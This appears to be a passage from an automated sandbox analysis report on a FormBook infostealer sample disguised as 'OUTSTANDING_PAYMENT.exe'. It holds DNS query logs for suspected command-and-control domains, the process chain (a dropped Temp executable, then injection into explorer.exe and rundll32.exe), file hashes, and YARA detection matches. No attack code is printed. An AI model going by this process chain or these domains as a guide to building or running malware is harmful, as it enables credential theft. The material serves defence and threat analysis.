                                                                                                                      Mar 20, 2023 09:10:01.385709047 CET8.8.8.8192.168.2.30xbe46Server failure (2)www.ketoibabal.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:02.523490906 CET8.8.8.8192.168.2.30x1805Server failure (2)www.ketoibabal.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:07.567246914 CET8.8.8.8192.168.2.30x1492Refused (5)www.thelastwill.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:08.626447916 CET8.8.8.8192.168.2.30x442dRefused (5)www.thelastwill.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:09.669090033 CET8.8.8.8192.168.2.30x46d1Refused (5)www.thelastwill.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:14.768513918 CET8.8.8.8192.168.2.30x87ccNo error (0)www.ty23vip.com162.209.159.142A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:25.829457998 CET8.8.8.8192.168.2.30xc5abNo error (0)www.allison2patrick.onlineallison2patrick.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:25.829457998 CET8.8.8.8192.168.2.30xc5abNo error (0)allison2patrick.online62.4.21.190A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:36.065522909 CET8.8.8.8192.168.2.30x5df2No error (0)www.glb-mobility.comglb-mobility.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:36.065522909 CET8.8.8.8192.168.2.30x5df2No error (0)glb-mobility.com88.99.217.197A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:46.512599945 CET8.8.8.8192.168.2.30x9aa8No error (0)www.fanversewallet.comfanversewallet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:46.512599945 CET8.8.8.8192.168.2.30x9aa8No error (0)fanversewallet.com203.245.24.47A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:58.134869099 CET8.8.8.8192.168.2.30x8e22No error (0)www.karlscurry.co.uk217.160.0.249A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:11:11.017399073 CET8.8.8.8192.168.2.30xd22Server failure (2)www.themssterofssuepnse.restnonenoneA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:11:37.163110971 CET8.8.8.8192.168.2.30x528Server failure (2)www.brennmansoluciones.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:11:38.328841925 CET8.8.8.8192.168.2.30xacb9Server failure (2)www.brennmansoluciones.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:11:39.494823933 CET8.8.8.8192.168.2.30x43adServer failure (2)www.brennmansoluciones.comnonenoneA (IP address)IN (0x0001)false

                                                                                                                      HTTP Request Dependency Graph

                                                                                                                      • www.hudsonandbailey.uk
                                                                                                                      • www.virginhairweave.co.uk
                                                                                                                      • www.dirdikyepedia.com
                                                                                                                      • www.g2fm.co.uk
                                                                                                                      • www.mynichemarket.co.uk
                                                                                                                      • www.landlotto.ru
                                                                                                                      • www.gorwly.top
                                                                                                                      • www.allison2patrick.online
                                                                                                                      • www.glb-mobility.com
                                                                                                                      • www.fanversewallet.com
                                                                                                                      • www.karlscurry.co.uk

                                                                                                                      Statistics

                                                                                                                      Behavior

                                                                                                                      Click to jump to process

                                                                                                                      System Behavior

                                                                                                                      General

                                                                                                                      Target ID:0
                                                                                                                      Start time:09:07:40
                                                                                                                      Start date:20/03/2023
                                                                                                                      Path:C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:297210 bytes
                                                                                                                      MD5 hash:4832E17C1F6841AEE2E1984A429ED946
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:low

                                                                                                                      General

                                                                                                                      Target ID:1
                                                                                                                      Start time:09:07:41
                                                                                                                      Start date:20/03/2023
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\qhcqh.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z
                                                                                                                      Imagebase:0xc50000
                                                                                                                      File size:59904 bytes
                                                                                                                      MD5 hash:41C9E29A7ED3640682A0003BE2DF4D93
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 51%, ReversingLabs
                                                                                                                      Reputation:low

                                                                                                                      General

                                                                                                                      Target ID:2
                                                                                                                      Start time:09:07:41
                                                                                                                      Start date:20/03/2023
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\qhcqh.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\qhcqh.exe
                                                                                                                      Imagebase:0xc50000
                                                                                                                      File size:59904 bytes
                                                                                                                      MD5 hash:41C9E29A7ED3640682A0003BE2DF4D93
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                      Reputation:low

                                                                                                                      General

                                                                                                                      Target ID:3
                                                                                                                      Start time:09:07:47
                                                                                                                      Start date:20/03/2023
                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                                                      Imagebase:0x7ff69fe90000
                                                                                                                      File size:3933184 bytes
                                                                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      General

                                                                                                                      Target ID:13
                                                                                                                      Start time:09:08:02
                                                                                                                      Start date:20/03/2023
                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                      Imagebase:0xe30000
                                                                                                                      File size:61952 bytes
                                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                      Reputation:high

                                                                                                                      Disassembly

                                                                                                                      No disassembly